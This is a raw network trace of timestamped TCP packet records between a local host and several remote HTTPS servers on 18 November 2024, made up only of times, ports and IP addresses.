                                                                                                                                                                                            Nov 18, 2024 21:00:06.612071037 CET4434973766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.612118006 CET4434974166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.612229109 CET49741443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.612369061 CET49737443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.612407923 CET4434973766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.612895966 CET4434973766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.613182068 CET49737443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.613261938 CET49737443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.613266945 CET4434973766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.613779068 CET4434973666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.613853931 CET49736443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.614164114 CET49736443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.614238977 CET4434973666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.614267111 CET49736443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.623562098 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.625339031 CET4434974066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.625993013 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.626065016 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.626065969 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.626080036 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.626121998 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.626238108 CET49740443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.626257896 CET4434974066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.627500057 CET4434972566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.627521038 CET4434972566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.627589941 CET49725443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.627626896 CET4434972566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.627675056 CET49725443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.627686977 CET4434972566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.627706051 CET4434972566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.627749920 CET49725443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.628247976 CET49725443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.628272057 CET4434972566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.628616095 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.628647089 CET4434974566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.628705025 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.629074097 CET49745443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.629087925 CET4434974566.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.629811049 CET4434974066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.629898071 CET49740443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.630239010 CET49740443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.630333900 CET4434972366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.630381107 CET4434972366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.630414963 CET4434974066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.630454063 CET49723443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.630472898 CET4434972366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.630475998 CET49740443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.630512953 CET49723443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.630512953 CET4434972366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.630562067 CET49723443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.631206989 CET49746443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.631294966 CET4434974666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.631504059 CET49723443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.631515980 CET4434972366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.631547928 CET49746443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.631728888 CET49747443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.631740093 CET4434974766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.631791115 CET49747443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.632168055 CET49746443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.632208109 CET4434974666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.632412910 CET49747443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.632430077 CET4434974766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.633677959 CET4434972466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.633724928 CET4434972466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.633843899 CET4434972466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.633917093 CET49724443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.634553909 CET49748443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.634574890 CET4434974866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.634951115 CET49724443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.634969950 CET4434972466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.634979010 CET49748443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.635189056 CET49749443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.635245085 CET4434974966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.635310888 CET49749443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.635552883 CET49748443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.635560989 CET4434974866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.635751963 CET49749443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.635780096 CET4434974966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.637239933 CET49750443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.637265921 CET4434975066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.637356043 CET49750443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.637538910 CET49750443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.637550116 CET4434975066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.651335001 CET4434972266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.655343056 CET4434974166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.659329891 CET4434973666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.659359932 CET4434973766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.665363073 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.665380001 CET49736443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.665405989 CET4434973666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.666464090 CET49737443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.671355963 CET4434974066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.681364059 CET49740443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.681382895 CET4434974066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.713378906 CET49736443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.713952065 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.713975906 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.714060068 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.714138985 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.714157104 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.714199066 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.714222908 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.714313984 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.714376926 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.715023041 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.715087891 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.715780020 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.715847015 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.715917110 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.715981007 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.716784000 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.716852903 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.727695942 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.727757931 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.727802992 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.727927923 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.727988005 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.727998018 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.728029966 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.728037119 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.728064060 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.728081942 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.728857040 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.728926897 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.728940964 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.728993893 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.729376078 CET49740443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.729399920 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.729465961 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.729748011 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.729830027 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.730523109 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.730596066 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.743511915 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.743520975 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.743587971 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.743750095 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.743756056 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.743810892 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.744465113 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.744471073 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.744530916 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.744985104 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.745049953 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.745704889 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.745781898 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.746321917 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.746383905 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.746824026 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.746886969 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.751529932 CET44349738157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.751744032 CET49738443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:06.751759052 CET44349738157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.753400087 CET44349738157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.753473043 CET49738443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:06.754309893 CET49738443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:06.754399061 CET44349738157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.754441023 CET49738443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:06.777471066 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.777555943 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.792850018 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.792917967 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.797461987 CET4434972266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.797513962 CET4434972266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.797576904 CET49722443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.797601938 CET4434972266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.797677040 CET4434972266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.797739983 CET49722443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.798146963 CET49722443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.798156977 CET4434972266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.798537970 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.798592091 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.798665047 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.799137115 CET49751443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.799161911 CET4434975166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.799329996 CET44349738157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.801331997 CET49752443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.801386118 CET4434975266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.801466942 CET49752443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.801644087 CET49752443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.801676035 CET4434975266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.802054882 CET4434974166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.802105904 CET4434974166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.802169085 CET49741443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.802186966 CET4434974166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.806627989 CET4434973766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.806684971 CET4434973766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.806704998 CET4434973766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.806723118 CET4434973766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.806742907 CET49737443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.806798935 CET4434973766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.806833029 CET49737443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.806879997 CET4434973666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.806938887 CET4434973666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.807005882 CET49736443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.807029963 CET4434973666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.807096958 CET4434973666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.807097912 CET49736443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.807214975 CET49736443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.807362080 CET49738443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:06.807375908 CET44349738157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.807821989 CET49736443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.807863951 CET4434973666.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.808166981 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.808245897 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.808322906 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.808581114 CET49753443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.808629990 CET4434975366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.822635889 CET4434974066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.822702885 CET4434974066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.822722912 CET4434974066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.822741032 CET4434974066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.822774887 CET49740443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.822808981 CET4434974066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.822844028 CET49740443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.833895922 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.833976984 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.834093094 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.834163904 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.834484100 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.834552050 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.834887028 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.834959030 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.835175991 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.835257053 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.835793018 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.835855961 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.835891962 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.835946083 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.835995913 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.836052895 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.836086035 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.836146116 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.836771965 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.836848021 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.836992979 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.837052107 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.837759972 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.837852001 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.837856054 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.837877035 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.837903976 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.838097095 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.838151932 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.838164091 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.838236094 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.838711023 CET44349730157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.838793039 CET49730443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.844247103 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.844366074 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.844369888 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.844400883 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.844444036 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.844444036 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.844517946 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.844597101 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.845345020 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.845427990 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.845536947 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.845598936 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.845813990 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.845890999 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.846129894 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.846199036 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.846240044 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.846297026 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.846636057 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.846702099 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.847136974 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.847214937 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.847255945 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.847328901 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.847522974 CET44349732157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.847599030 CET49732443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.855369091 CET49741443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.855380058 CET49737443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:06.855477095 CET49738443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:06.863643885 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.863712072 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.864120960 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.864200115 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.864595890 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.864665031 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.864674091 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.864685059 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.864746094 CET49731443192.168.2.16157.240.249.63
                                                                                                                                                                                            Nov 18, 2024 21:00:06.865272999 CET44349731157.240.249.63192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:06.865349054 CET49731443192.168.2.16157.240.249.63
